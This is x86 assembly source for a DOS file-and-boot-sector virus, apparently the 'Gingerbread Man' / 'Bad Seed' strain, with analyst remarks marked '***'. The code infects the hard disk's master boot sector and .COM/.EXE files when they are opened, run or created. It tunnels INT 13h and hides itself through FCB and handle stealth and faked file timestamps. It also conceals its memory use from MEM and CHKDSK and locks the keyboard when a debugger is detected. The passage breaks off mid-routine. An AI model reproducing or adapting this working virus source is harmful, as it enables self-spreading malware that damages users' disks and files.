MOV ES:Ofs_Real_Int13h, OFFSET Real_Int13h
MOV ES:Origin, Boot
MOV ES:File_Handle, 0

MOV SI, OFFSET Hook_Ints

PUSH ES ; Relocated virus code.


PUSH SI

MOV AX, OFFSET Boot_Int21h


MOV SI, OFFSET Boot_Loader
MOV DI, OFFSET Old_Int08h
NOP

RETF ; Jump to relocated code.

EXE_Data:

EXE_SP DW 0
EXE_SS DW 0
EXE_IP DW 0
EXE_CS DW 0

DB 'You can''t catch the Gingerbread Man!!'

File_Entry:
XCHG BP, AX ; Save AX (FCB-status) in BP.

POP SI ; POP delta offset.

PUSH ES ; Save ES & DS (PSP).


PUSH DS

PUSH CS
POP DS

MOV AX, 0EEE7h ; See if virus is already


INT 21h ; TSR.

CMP AX, 0D703h ; It is?


JE JMP_Run_Host ; Then bail to host.

MOV ES, ES:[2Ch] ; Environment block.

CLD
XOR DI, DI

Find_ComSpec: PUSH SI

; Scan for COMSPEC= to find the command interpreter.

ADD SI, (ComSpec_String-Boot_Loader)


MOV CX, 8
REPE CMPSB

PUSHF

CALL Get_End_DI ; Go to the next setting.

POPF
JE Save_ComSpec ; Yeah got it..
POP SI

JNE Find_ComSpec ; Repeat the search.

JMP_Run_Host: JMP Run_Host

DB 'Bad Seed - Made in OZ'

Save_ComSpec: PUSH DS ; Swap DS & ES.


PUSH ES
POP DS
POP ES

XCHG SI, DI ; SI = end of path to command


; interpreter.

STD ; SI = last byte of path to


LODSW ; command interpreter.

MOV CX, SI ; Remember end offset.


DEC CX ; Exclude the '\'.

ADD DI, 12 ; DI = end of ComSpec_Value.


; *** Buffer is 1 byte too
; small, now filenames with
; 8 characters will fuck up.
Copy_ComSpec: LODSB
STOSB

CMP AL, '\' ; Copied entire filename?


JNE Copy_ComSpec ; Otherwise just go on.

SUB CX, SI ; Get the size of the command


; interpreter filename.
POP SI

PUSH CS
POP DS

; Keep it for later use.

MOV [SI+(ComSpec_Length-Boot_Loader)], CL

MOV BYTE PTR [SI+(Origin-Boot_Loader)], File

XOR AX, AX ; ES = IVT.


MOV ES, AX

PUSH SI

; Copy the stealth code to an unused piece


; of memory (only used during bootup).

ADD SI, (File_Int21h-Boot_Loader)


MOV DI, 600h
MOV CX, (End_Body-File_Int21h)
CLD
REP MOVSB

POP SI

MOV DS, CX ; DS = IVT.


; Patch appropriate offsets.

MOV DS:600h+(Ofs_Old_Int13h-File_Int21h), 600h+(Old_Int13h-File_Int21h)


MOV DS:600h+(Ofs_Real_Int13h-File_Int21h), 600h+(Real_Int13h-File_Int21h)

MOV AX, 600h ; INT 21h ISR to hook up.

Hook_Ints: CLI

; Starting from a bootsector or file?

CMP BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot


JNE Hook_Int21h

MOV AX, OFFSET New_Int08h ; Hook INT 08h.


XCHG DS:[(08h*4)], AX
STOSW

MOV AX, CS
XCHG DS:[(08h*4)+2], AX
STOSW

MOV DS:[(21h*4)+2], 0FFFFh ; Initialize DOS segment to


; a dummy value so the virus
; can determine when DOS has
; been loaded.
STI

ADD DI, (Old_Int13h-(Old_Int08h+4))


JMP SHORT Init_Tunnel_13

Hook_Int21h: XCHG DS:[(21h*4)], AX ; Hook INT 21h.


STOSW

XCHG BX, AX ; Save original INT 21h.

MOV AX, ES
XCHG DS:[(21h*4)+2], AX
STOSW

XCHG BX, AX ; Store original INT 21h


STOSW ; another time.

XCHG BX, AX
STOSW

; Hook INT 01h for recursive tunneling.

LEA AX, CS:[SI+(New_Int01h-Boot_Loader)]


XCHG DS:[(01h*4)], AX
STOSW

MOV AX, CS
XCHG DS:[(01h*4)+2], AX
STOSW

STI

Init_Tunnel_13: CLC ; Save INT 13h, then tunnel


; INT 13h.
PUSH ES

Save_Int13h: PUSH DS
LDS BX, DS:[(13h*4)] ; Get (tunneled) INT 13h.

MOV AX, BX ; Save (tunneled) INT 13h.


STOSW

MOV AX, DS
STOSW

JC Pick_i13h_ISR ; Already tunneled INT 13h ?

PUSH DS ; ES:BX = INT 13h.


POP ES

PUSHF ; Recursively tunnel INT 13h


PUSH CS ; if origin is file, else
CALL Tunnel_Int13h ; just save INT 13h.

POP DS
POP ES

STC ; Set flag to only save


JC Save_Int13h ; INT 13h.

Pick_i13h_ISR: POP DS

PUSH SI

CMP BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot

PUSHF

; Stealth ISR.

MOV SI, 600h+(Boot_Int13h-File_Int21h)

JNE Hook_Int13h

; Stealth/infection ISR.

MOV SI, OFFSET Boot_Int13h

Hook_Int13h: CLI ; Hook the virus up.


MOV DS:[(13h*4)], SI
MOV DS:[(13h*4)+2], ES
STI

POPF

POP SI

PUSH CS
POP DS

JE Run_Old_Boot ; Pass control to real BS.

; If running from a file then go infect the MBS.

PUSH ES

PUSH CS
POP ES
MOV AX, 0201h ; Read the MBS of HDD 1.
LEA BX, CS:[SI+(Buffer-Boot_Loader)]
MOV CX, 1
MOV DX, 80h
INT 03h

POP ES

JNC Scan_Part_Tbl ; Go on if no error.

JMP SHORT Swap_Boot_ID ; Error, bail.

Scan_Part_Tbl: MOV CX, 4 ; Maximum of 4 partitions.


MOV DI, 1BEh ; Start of partition info.

Find_Act_Part: TEST BYTE PTR [BX+DI], 80h ; It's the active partition?
JNZ Chk_Partition

ADD DI, 16 ; Next partition.

LOOP Find_Act_Part ; Check all partitions.

Run_Host: POP DS ; Restore PSP.


MOV DX, DS ; Save PSP in DX.

POP ES

; This host is of EXE-type?

CMP CS:[SI+(Host_Header-Boot_Loader)], 'ZM'


JE Restore_EXE

; Restore .COM-file in memory and execute it.

ADD SI, (Host_Header-Boot_Loader)


MOV DI, 100h

PUSH CS ; Push entrypoint of host


PUSH DI ; *** CS mod ain't needed.

MOVSB ; Restore first 3 bytes of


MOVSW ; the host.

XOR AX, AX ; Clear registers.


XOR BX, BX
XOR CX, CX
XOR DX, DX
XOR SI, SI
XOR DI, DI

XCHG BP, AX ; Restore FCB status in AX.

RETF ; Jump to the host.

Run_Old_Boot:
XOR CX, CX ; Zero ES.
MOV ES, CX

MOV AX, 0201h ; Read the standard MS-DOS


MOV BX, 7C00h ; bootsector.
MOV CX, 1
MOV DX, 0180h
INT 13h

PUSH ES ; And go execute it.


PUSH BX
RETF

Restore_EXE: ADD DX, (100h/16) ; Get effective segment.

; Update old CS & SS with it.

ADD CS:[SI+(EXE_CS-Boot_Loader)], DX
ADD DX, CS:[SI+(EXE_SS-Boot_Loader)]

; Restore host's original stack.

MOV SS, DX
MOV SP, CS:[SI+(EXE_SP-Boot_Loader)]

XCHG BP, AX ; Restore AX (FCB status).

; Jump to the host's original entrypoint.

JMP DWORD PTR CS:[SI+(EXE_IP-Boot_Loader)]

Chk_Partition: INC DI ; Start of partition.

MOV ES:[600h+(Act_Partition-File_Int21h)], DI
MOV DS:[SI+(Act_Partition-Boot_Loader)], DI

MOV AX, 0200h ; Head 0, sector 2 (where


; the virusbody is located).

CMP DS:[BX+DI], AX ; MBS is already infected?


JE Run_Host ; Then just bail out.

MOV DS:[BX+DI], AX ; Point partition's boot-


; sector to virusbody.
PUSH CS
POP DS

CLC ; No errors so far..

Swap_Boot_ID: MOV AX, 0AA55h ; Bootsector ID.

XCHG DS:[SI+510], AX ; Swap-in bootsector ID.

PUSH AX ; Save original word.


JC Chk_If_Unhook ; Error occurred?

; Save original word in virusbody.

MOV [SI+(Original_Word-Boot_Loader)], AX

PUSH CS
POP ES

MOV AX, 0301h ; Write patched MBS back


MOV CX, 1 ; to disk.
MOV DX, 80h
INT 03h
JC Chk_If_Unhook
; Write the virusbody to the zero-track.

MOV AX, 0300h + (Virus_Size_512)


MOV BX, SI
MOV CX, 2
INT 03h

Chk_If_Unhook: MOV AX, 0 ; Zero DS & ES (without


MOV ES, AX ; changing any flags).
MOV DS, AX

PUSH SI

CLD
CLI

JNC Restore_Int03h ; Harddisk was succesfully


; infected? If not, unhook
; the INT 13h stealth.

MOV SI, 600h+(Old_Int13h-File_Int21h)


MOV DI, (13h*4)
MOVSW
MOVSW

Restore_Int03h: POP SI
PUSH SI

PUSH CS
POP DS

; Restore INT 03h.

ADD SI, (Old_Int03h-Boot_Loader)


MOV DI, (03h*4)
MOVSW
MOVSW

STI

POP SI

POP DS:[SI+510] ; Restore original word.

JMP Run_Host

; Called with ES:BX as vector address of INT 13h.


Tunnel_Int13h:
PUSHF

; Not necessary to tunnel from boot.

CMP BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot


JE Push_CS_IP

POPF

MOV AX, 300h ; Flags, TF & IF enabled.


PUSH AX

Push_CS_IP: PUSH ES ; Untunneled INT 13h.


PUSH BX
MOV AH, 01h ; Get status byte.
MOV DL, 80h ; 1st HDD.

New_Int01h: CLI

PUSH BP ; Setup a stack pointer.


MOV BP, SP

PUSH BX ; Save scrap registers.


PUSH AX

MOV BX, CS ; *** Not used.

MOV AX, [BP+(2*2)] ; Get segment of next


; instruction.

CMP AX, 70h ; In the DOS kernel?


JA Exit_Int01h ; If not then get out.

PUSH DS
PUSH ES

XOR BX, BX ; DS = IVT.


MOV DS, BX

MOV DS:[(13h*4)+2], AX ; Set tunneled address in


; IVT.

MOV BX, [BP+(1*2)] ; And the IP..


MOV DS:[(13h*4)], BX

PUSH DI

CALL Get_Delta_1

Old_Int03h DW 0, 0

Get_Delta_1: POP DI ; POP delta offset.

PUSH CS
POP ES

CLD

XCHG BX, AX ; Revector the tunneled


XCHG DS:[(03h*4)], AX ; INT 13h to INT 03h.
STOSW

XCHG BX, AX
XCHG DS:[(03h*4)+2], AX
STOSW

PUSH DS ; ES = IVT.
POP ES

PUSH SI

; Unhook INT 01h.

MOV SI, 600h+(Old_Int01h-File_Int21h)


MOV DI, (01h*4)
MOVSW
MOVSW

POP SI

POP DI
POP ES
POP DS

Exit_Int01h: POP AX ; Restore registers.


POP BX
POP BP

STI ; *** Useless instruction.

IRET

ComSpec_String DB 'COMSPEC='
ComSpec_Value DB 13 DUP (0)
ComSpec_Length DW 0

New_Int08h:
PUSH DS
PUSH AX

XOR AX, AX ; DS = IVT.


MOV DS, AX

CMP DS:[(21h*4)+2], 1000h ; DOS hasn't grabbed INT 21h


JA Exit_Int08h ; yet? Then wait some more..

PUSH ES
PUSH SI
PUSH DI

PUSH CS
POP ES

MOV AX, CS
MOV DI, OFFSET Old_Int21h+2
NOP

STD ; Hook INT 21h.


CLI
XCHG AX, DS:[(21h*4)+2]
STOSW

MOV AX, OFFSET Boot_Int21h


XCHG AX, DS:[(21h*4)]
STOSW

PUSH DS ; Swap DS & ES.


PUSH ES
POP DS
POP ES

MOV SI, DI ; Unhook INT 08h.


MOV DI, (08h*4)+2
MOVSW
MOVSW

STI
POP DI
POP SI
POP ES

Exit_Int08h: POP AX
POP DS

JMP DWORD PTR CS:Old_Int08h

Boot_Int21h:
PUSH DS
PUSH AX

XOR AX, AX ; DS = IVT.


MOV DS, AX

MOV AX, DS:[(01h*4)] ; Offset of INT 01h's ISR.

CMP AX, DS:[(03h*4)] ; Same as INT 03h's ?


JNE Lock_Keyboard

MOV AX, DS:[(01h*4)+2] ; Segment of INT 01h's ISR.

CMP AX, DS:[(03h*4)+2] ; Same as INT 03h's ?


JE Exit_No_Debug ; If INT 01h != INT 03h then
; a debugger is active.

Lock_Keyboard: MOV AL, 10000010b ; Disable keyboard & printer.


OUT 21h, AL

Exit_No_Debug: POP AX
POP DS

Test_11h_12h: CMP AH, 11h ; Findfirst (FCB) ?


JE Do_FCB_Stealth

CMP AH, 12h ; Findnext (FCB) ?


JNE Check_4_Create

; This is the routine Rock Steady/NuKE used in his


; FCB stealth tut, with one or two bytes changed.
; The rest of the code also shows a certain influence
; of the Rock Steady tuts.

Do_FCB_Stealth: CALL Do_Old_Int21h ; Do the filefind.

TEST AL, AL ; Error?


JNZ IRET_FCB_St

PUSH ES
PUSH AX
PUSH BX

MOV AH, 51h ; Obtain current PSP.


CALL Do_Old_Int21h

MOV ES, BX

CMP BX, ES:[16h] ; Owner PSP == PSP ? (ie. is


JNE Exit_FCB_St ; command interpreter?).
MOV BX, DX
MOV AL, [BX] ; Get first byte of FCB.

PUSH AX

MOV AH, 2Fh ; Obtain current DTA.


CALL Do_Old_Int21h

POP AX

INC AL ; It's an extended FCB ?


JNZ Test_Seconds

ADD BX, 7 ; Then skip extended stuff.

Test_Seconds: MOV AX, ES:[BX.FCB_Time] ; Grab time word.

AND AX, 0000000000011111b ; Mask out seconds value.

XOR AL, (60/2) ; 60 seconds? (infected?).


JNZ Exit_FCB_St

; Set the seconds value in the DTA to 2.

AND BYTE PTR ES:[BX.FCB_Time], 11100000b


OR BYTE PTR ES:[BX.FCB_Time], (2/2)

; Subtract the virussize from the filesize.

SUB ES:[BX.FCB_Size], Virus_Size


SBB ES:[BX.FCB_Size+2], AX

Exit_FCB_St: POP BX
POP AX
POP ES

IRET_FCB_St: IRET

Check_4_Create: CMP AH, 3Ch ; Create/truncate file?


JE Set_RW_BX ; Then save it's handle
; so it can be infected
; on close.

CMP AH, 3Dh ; Open file?


JE Set_RW_AL ; Go infect it.

CMP AH, 3Eh ; Close file?


JNE Check_4_Read

JMP Infect_3E ; Infect it if it was


; a newly created file.

Check_4_Read: CMP AH, 3Fh ; Read file?


JE J_Go_Chk_Secs ; Stealth the read.

CMP AH, 40h ; Write file?


JE J_Go_Chk_Secs ; Disinfect the file.

CMP AH, 42h ; Seek file?


JNE Check_4_Exec

CMP AL, 02h ; Seek EOF relative?


JB J1_J_Old_i21h
J_Go_Chk_Secs: JMP Go_Check_Secs ; Stealth stuff.

Check_4_Exec: CMP AH, 4Bh ; Execute/load file?


JNE Check_4_Exit

CMP AL, 02h ; It's either 4B00h or 4B01h?


JB CALL_Do_Infect ; Else don't infect.

JMP SHORT J1_J_Old_i21h

Set_RW_AL: CMP CS:Windows_Active, 1 ; Is Windoze running? Then


JE J1_J_Old_i21h ; don't do anything.

CMP AX, 3D01h ; Open file, write-only?


JNE CALL_Do_Infect

INC AL ; Then change access mode to


; read/write so the virus
; can read from it when it
; wants to disinfect it.

CALL_Do_Infect: CALL Do_Infect ; Infect it.

J1_J_Old_i21h: JMP JMP_Old_Int21h

Check_4_Exit: CMP AH, 4Ch ; Program terminate?


JNE Check_4_Date_T

JMP Check_Win_Exit ; Go check if it's Windoze.

Check_4_Date_T: CMP AH, 57h ; Get/set file date & time?


JNE Chk_4_Create_N

JMP Stealth_Seconds ; Don't let em fuck with the


; seconds.

Chk_4_Create_N: CMP AH, 5Bh ; Create new file?


JE Set_RW_BX ; Save it's handle for later.

CMP AX, 6C00h ; Extended open/create?


JNE Chk_4_Res_Chk

Set_RW_BX: CMP CS:Windows_Active, 1 ; Is Windoze up and running?


JE J1_J_Old_i21h ; Then abort any infection.

PUSH BX
PUSH DX

CMP AX, 6C00h ; Don't infect on create.


JNE Save_Handle

OR BL, 00000010b ; Change access mode to


AND BL, 11111110b ; read/write.

MOV DX, SI ; DX = offset filepath.


CALL Do_Infect

Save_Handle: PUSH BX
PUSH ES
PUSH AX
PUSH CX
PUSH SI
PUSH DI

PUSH DS
POP ES

CALL Get_End_DX ; Go to end of path.

STD
MOV SI, DI

LODSB ; SI = last word extension.


LODSW

CALL Check_Extension ; .COM/EXE extension?

MOV CS:Valid_Handle, CL ; Mark handle as invalid (0).

JNE Do_Open_Create

INC CX ; Mark handle as valid (1).


MOV CS:Valid_Handle, CL

Do_Open_Create: POP DI
POP SI
POP CX
POP AX
POP ES
POP BX
POP DX

PUSH AX

CALL Do_Old_Int21h ; Do the open/create call.


JC Clear_Inf_Hand

INC SP ; Remove the top word on


INC SP ; the stack.

XCHG BX, AX ; Save the new filehandle.

PUSH CX
PUSH DX

MOV AX, 5700h ; Get file's date & time.


CALL Do_Old_Int21h

CALL Check_60_Secs ; It's infected?

POP DX
POP CX

XCHG BX, AX

JNE Save_Inf_Hand

MOV CS:Valid_Handle, AL ; Mark handle as valid (> 0).

Save_Inf_Hand: MOV CS:File_Handle, AL ; Save this filehandle.


POP BX
JMP IRET_Flags

Clear_Inf_Hand: MOV CS:Valid_Handle, 0 ; Reset handle-valid boolean.


POP AX
POP BX
JMP JMP_Old_Int21h

Chk_4_Res_Chk: CMP AX, 0EEE7h ; It's the virus' TSR check?


JE Return_ID_1

JMP JMP_Old_Int21h

Return_ID_1: MOV AH, 0D7h ; Return ID in AX and return.

New_Int24h: MOV AL, 03h ; Fail silently.


IRET

Get_End_DX:
MOV DI, DX

Get_End_DI: XOR AL, AL ; Scan to the end of the


MOV CL, 128 ; filepath.
CLD
REPNZ SCASB

RETN

Do_Infect:
PUSH ES
PUSH BX
PUSH CX
PUSH SI
PUSH DI
PUSH DS
PUSH DX

PUSH DS
POP ES

PUSH AX

CALL Get_End_DX

DEC DI ; DI = last byte of filename.


DEC DI

PUSH CS
POP DS

MOV CX, ComSpec_Length


MOV SI, OFFSET ComSpec_String+8+12
STD

PUSH DI

Comp_ComSpec: LODSB ; Save ComSpec byte in AH.


MOV AH, AL

XCHG SI, DI

LODS BYTE PTR ES:[SI] ; Fetch byte from filename.

XCHG SI, DI

AND AX, 5F5Fh ; Convert word to uppercase.


CMP AH, AL ; Bytes match?
JNE Go_Check_Ext ; If not it's not ComSpec.

LOOP Comp_ComSpec

POP DI ; If it get's to here, the


; file is the COMSPEC, and
JMP Exit_Infect ; infection is denied.

; Returns ZF if file has COM/EXE extension.


Check_Extension:
MOV CX, 2

Get_Extension: LODS WORD PTR ES:[SI]

AND AX, 5F5Fh ; Uppercase.

XCHG BX, AX

LOOP Get_Extension

CMP AX, 'MO'


JNE Check_For_EXE

CMP BX, 'C.' AND 5F5Fh

RETN

Check_For_EXE: CMP AX, 'EX'


JNE Exit_Check_Ext

CMP BX, 'E.' AND 5F5Fh

Exit_Check_Ext: RETN

Go_Check_Ext: POP SI ; SI = last byte of filename.


DEC SI ; SI = last word of filename.

POP AX ; AX on entry.
PUSH AX

CMP AX, 4B00h ; Program execute?


PUSHF

CALL Check_Extension ; File has COM/EXE extension?


JE Go_Chk_Win_Act

POPF
JE Find_File_Name

JMP Exit_Infect

DB 'CHKDSK', 0
Windows_Active = BYTE PTR $-1

DB 'MEM'
Mem_String = $-1

Go_Chk_Win_Act: POPF
JNE Check_Windows

Find_File_Name: INC SI ; DI = byte before dot.


MOV DI, SI

INC SI ; SI = extension dot.

MOV CX, SI ; Calculate path length.


SUB CX, DX

XCHG SI, DI

Chk_Start_Name: LODS BYTE PTR ES:[SI] ; Fetch a byte from path.

CMP AL, '\' ; Path seperator? Then start


JE Get_Start_Name ; of filename is found.

LOOP Chk_Start_Name

JNE Chk_File_Name

Get_Start_Name: INC SI ; SI = start of filename.


INC SI

MOV DX, SI

Chk_File_Name: MOV CX, DI ; Calculate length of


SUB CX, DX ; filename without extension.

DEC DI ; DI = last byte of filename.


MOV SI, OFFSET Mem_String

CMP CX, 3 ; Can it be 'MEM' ?


JE Compare_Byte

LODSW ; SI = 'CHKDSK' string.


LODSW

CMP CX, 6 ; Can it be 'CHKDSK' ?


JNE Check_Windows

Compare_Byte: LODSB ; Fetch byte of filename and


MOV AH, AL ; save it in AH.

XCHG SI, DI

LODS BYTE PTR ES:[SI] ; Fetch byte of match string.

AND AX, 5F5Fh ; Convert to uppercase.

CMP AH, AL ; Bytes are the same?


JNE Check_4_Win ; If not, skip this shit.

XCHG SI, DI

LOOP Compare_Byte

; Now that either MEM or CHKDSK are about to be executed, the


; virus will temporarily hook INT 12h to stealth the total
; amount of DOS memory available, which these programs will
; display.

MOV AX, OFFSET New_Int12h


MOV DI, OFFSET Old_Int12h
NOP
MOV DS, CX ; DS = IVT.

PUSH CS
POP ES

CLD
CLI

XCHG DS:[(12h*4)], AX ; Save & hook INT 12h.


STOSW

MOV AX, CS
XCHG DS:[(12h*4)+2], AX
STOSW

STI
JMP SHORT Check_Windows

Check_4_Win: CMP CX, 3 ; Can it be 'WIN.COM' ?


JNE Check_Windows

CMP AL, 'N' ; (WI)N ?


JNE Check_Windows

DEC SI ; SI = 1st word of filename.


LODS WORD PTR ES:[SI]

AND AX, 5F5Fh ; Uppercase.

CMP AX, 'IW' ; So it's WIN.COM ?


JNE Check_Windows

MOV Windows_Active, 1 ; Set Windoze-active flag.

Check_Windows: CMP CS:Windows_Active, 1 ; Don't infect under Windoze.


JE Exit_Infect

CLI

XOR CX, CX ; DS = IVT.


MOV DS, CX

LES BX, DS:[(24h*4)] ; Save original INT 24h.


PUSH ES
PUSH BX

; Install own dummy critical-error handler.

MOV DS:[(24h*4)], OFFSET New_Int24h


MOV DS:[(24h*4)+2], CS

STI

PUSH DS

PUSH BP ; Setup stackframe.


MOV BP, SP

LDS DX, [BP+(5*2)] ; DS:DX = path of file.

POP BP

PUSH DS
PUSH DX

MOV AX, 4300h ; Get file's attributes.


CALL Do_Old_Int21h
PUSH CX
JC Restore_Attr

TEST CL, 00000001b ; Readonly bit set?


JZ Open_File

DEC CX ; Remove readonly bit.

MOV AX, 4301h ; Set new attributes.


CALL Do_Old_Int21h

Open_File: MOV AX, 3D02h ; Open target file for r/w.


CALL Do_Old_Int21h
JC Restore_Attr

XCHG BX, AX ; Save filehandle in BX.

MOV AX, 5700h ; Get file date & time.


CALL Do_Old_Int21h
JC Close_File

CALL Check_60_Secs ; Already infected?


JE Close_File

PUSH CX ; Save original filedate &


PUSH DX ; time with 60 seconds set.

CALL Infect_Handle ; Infect the handle.

POP DX
POP CX

JC Close_File ; Error occurred?

MOV AX, 5701h ; Restore file date & time


CALL Do_Old_Int21h ; with 60 seconds.

Close_File: MOV AH, 3Eh ; Close the file.


CALL Do_Old_Int21h

Restore_Attr: POP CX ; File path & attributes.


POP DX
POP DS

JC Restore_Int24h ; Error occurred?

TEST CL, 00000001b ; Need to restore the


JZ Restore_Int24h ; readonly flag?

MOV AX, 4301h ; Fix file-attributes.


CALL Do_Old_Int21h

Restore_Int24h: POP DS
POP BX
POP AX

MOV DS:[(24h*4)], BX ; Restore INT 24h.


MOV DS:[(24h*4)+2], AX
Exit_Infect: POP AX
POP DX
POP DS
POP DI
POP SI
POP CX
POP BX
POP ES

RETN

Infect_Handle:
PUSH CS
POP DS

MOV DX, OFFSET Buffer ; Read file's header.


NOP
MOV CX, 24
MOV AH, 3Fh
CALL Do_Old_Int21h

SUB CX, AX ; All bytes were read?


JNZ Error_Exit_Inf

PUSH DS ; ES = CS.
POP ES

XCHG CX, AX ; CX = 24.

MOV SI, DX ; Save a copy of the original


MOV DI, OFFSET Host_Header ; header.
CLD
REP MOVSB

MOV DI, DX ; DX = header.


MOV SI, OFFSET EXE_Data

; Save host's original SS:SP.

LES AX, DWORD PTR [DI.Program_SS]

MOV [SI+(EXE_SP-EXE_Data)], ES
MOV [SI+(EXE_SS-EXE_Data)], AX

; Save host's original CS:IP.

LES AX, DWORD PTR [DI.Program_IP]

MOV [SI+(EXE_IP-EXE_Data)], AX
MOV [SI+(EXE_CS-EXE_Data)], ES

MOV Host_Type, CL ; Initialize file as .EXE.

MOV AX, 'MZ' ; EXE marker.

CMP AX, [DI.EXE_ID] ; .EXE-ID is 'ZM' ?


XCHG AH, AL ; Change .EXE-ID to 'MZ'.
JNE Check_For_MZ

MOV [DI.EXE_ID], AX ; Set .EXE-ID to 'MZ'.

Check_For_MZ: CMP AX, [DI.EXE_ID] ; 'MZ' .EXE-file?


JE Save_File_Size

INC Host_Type ; Mark as .COM-file.

Save_File_Size: MOV AX, 4202h ; Seek to EOF.


MOV DX, CX
CALL Do_Old_Int21h
JC Exit_Inf_Hand

; Remember size of host for later use.

MOV [DI+(Host_Size-Buffer)], AX
MOV [DI+(Host_Size-Buffer)+2], DX

CMP Host_Type, EXE ; File is .EXE-type? Then


JE Check_Header ; size check ain't needed.

CMP AX,-(Virus_Size+264h) ; .COM-file ain't too big?


JB Append_Body

Error_Exit_Inf: STC ; Else mark error.

Exit_Inf_Hand: RETN

Check_Header: PUSH DI

MOV CX, 9

MOV SI, [DI.File_512_Pages] ; Filesize in 512-byte pages.


DEC SI ; Undo 512-byte round.

XOR DI, DI ; DI:SI = imagesize.

Mul_512: SHL SI, 1 ; Calculate imagesize in


RCL DI, 1 ; DI:SI.
LOOP Mul_512

CMP DX, DI ; High word doesn't match?


POP DI
JNE Error_Exit_Inf ; Then it's an overlay.

ADD SI, [DI.Image_Mod_512] ; Image size remainder.

; Low word of filesize doesn't match?

CMP SI, [DI+(Host_Size-Buffer)]


JNE Error_Exit_Inf

CMP AX, Virus_Size ; .EXE can't be smaller than


SBB DX, 0 ; the virus itself.
JC Exit_Inf_Hand

XOR DX, DX

CMP DX, [DI.Max_Size_Mem] ; Can't have a NULL maximum


JE Error_Exit_Inf ; memory requirement.

Append_Body: MOV CX, Virus_Size ; Append virusbody to file.


MOV AH, 40h
CALL Do_Old_Int21h
JC Exit_Inf_Hand

SUB CX, AX ; Were all bytes written?


JNZ Error_Exit_Inf ; Else mark as failure.

MOV DX, CX ; *** DX is already zero.

MOV AX, 4200h ; Seek to BOF.


CALL Do_Old_Int21h
JC Exit_Inf_Hand

MOV AX, [DI+(Host_Size-Buffer)]

CMP Host_Type, COM


JE Infect_COM

Infect_EXE: MOV DX, [DI+(Host_Size-Buffer)+2]

MOV CX, 4
PUSH DI
MOV SI, [DI.Header_Size]
XOR DI, DI

Mul_16: SHL SI, 1 ; Calculate headersize.


RCL DI, 1
LOOP Mul_16

SUB AX, SI ; Calculate imagesize.


SBB DX, DI

POP DI

MOV CL, 12 ; 64k's DIV 4096 to get the


SHL DX, CL ; new CS.

MOV [DI.Program_IP], AX
MOV [DI.Program_CS], DX

ADD DX, 3408/16 ; Set new stack.

MOV [DI.Program_SP], AX
MOV [DI.Program_SS], DX

ADD [DI.Min_Size_Mem], 448/16


MOV AX, [DI.Min_Size_Mem]

CMP AX, [DI.Max_Size_Mem] ; MaxMemSize must be atleast


JB Calc_New_Img_S ; MinMemSize.

MOV [DI.Max_Size_Mem], AX ; MaxMemSize == MinMemSize.

Calc_New_Img_S: MOV AX, [DI.Image_Mod_512]


ADD AX, Virus_Size
PUSH AX

AND AH, 1 ; AX modulo 512.

MOV [DI.Image_Mod_512], AX
POP AX

MOV CL, 9 ; AX DIV 512.


SHR AX, CL

ADD [DI.File_512_Pages], AX
MOV DX, OFFSET Buffer
NOP
MOV CX, 24 ; Write 24 bytes (MZ-header).
JMP SHORT Write_Header

Infect_COM: MOV DX, OFFSET Buffer


NOP
MOV DI, DX
MOV BYTE PTR [DI], 0E9h ; JMP xxxx.
INC DI
SUB AX, 3 ; Calculate displacement.

PUSH DS
POP ES

CLD ; Store JMP displacement.


STOSW

MOV CX, 3 ; Write 3 bytes (JMP_Virus).

Write_Header: MOV AH, 40h ; Write modified header.


CALL Do_Old_Int21h
JC Bad_Exit

CMP AX, CX ; All bytes were written?


JE Good_Exit

Bad_Exit: STC

Good_Exit: RETN

; Infect the handle of a newly created file when it is closed.


Infect_3E:
CMP CS:File_Handle, BL ; They're closing our handle?
JNE Go_Close_Hnd

CMP CS:Valid_Handle, 1 ; Does File_Handle contain


JNE Go_Close_Hnd ; a valid filehandle at all?

DEC CS:Valid_Handle ; Reset the filehandle (0).

PUSH DS
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI

MOV AX, 4200h ; Seek to file's header.


XOR CX, CX
XOR DX, DX
CALL Do_Old_Int21h

CALL Infect_Handle ; Go infect the file.


JC Exit_Infect_3E

MOV AX, 5700h


CALL Do_Old_Int21h

INC AL ; *** Not used.

OR CL, (62/2) ; Set 60 seconds.


DEC CX
MOV AX, 5701h
CALL Do_Old_Int21h

Exit_Infect_3E: POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POP ES
POP DS

Go_Close_Hnd: CALL Do_Old_Int21h

JMP IRET_Flags

Go_Check_Secs:
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI

MOV AX, 5700h


CALL Do_Old_Int21h

OR AL, AL ; *** This seems fucked, CF


JC Exit_Go_Chk_Se ; is always cleared after OR.

CALL Check_60_Secs

Exit_Go_Chk_Se: POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POP ES

JE Stealth_Handle

JMP JMP_Old_Int21h

Check_60_Secs:
MOV AL, CL

OR CL, (62/2) ; Set 60 seconds.


DEC CX

XOR AL, CL

RETN

Stealth_Handle:
PUSH DS

PUSH DX
PUSH CX
PUSH AX

PUSH CS
POP DS

MOV Read_Count, CX ; Save CX for later use.

XOR CX, CX

MOV New_Read_Count, CX

MOV AX, 4201h ; Get current file position.


XOR DX, DX
CALL Do_Old_Int21h

MOV File_Pos, AX ; Save it for later.


MOV File_Pos+2, DX

MOV AX, 4202h ; Get filesize.


XOR DX, DX
CALL Do_Old_Int21h

SUB AX, Virus_Size ; Get original filesize.


SBB DX, 0

MOV Orig_Size, AX ; Save it.


MOV Orig_Size+2, DX

POP AX

CMP AH, 42h ; It is a seek EOF relative?


JNE Rest_File_Pos

POP CX ; CX:DX = EOF displacement.


POP DX

POP DS

PUSH CX

SUB DX, Virus_Size ; Do the seek relative to


SBB CX, 0 ; the clean filesize instead
CALL Do_Old_Int21h ; of the infected size.

POP CX

JMP IRET_Flags

JMP_Cln_Handle: JMP Clean_Handle

Rest_File_Pos: PUSH AX

MOV AX, 4200h ; Restore original position.


MOV DX, File_Pos
MOV CX, File_Pos+2
CALL Do_Old_Int21h

OR DX, DX ; They're attempting to


JNZ JA_Chk_Body_Rd ; access the 1st 64k ?

CMP AX, 23 ; The header in particular?


JA_Chk_Body_Rd: JA Chk_Body_Reach
POP AX ; Restore AX & CX.
POP CX
PUSH CX
PUSH AX

CMP AH, 3Fh ; It is a read?


JNE JMP_Cln_Handle ; Else it's a write.

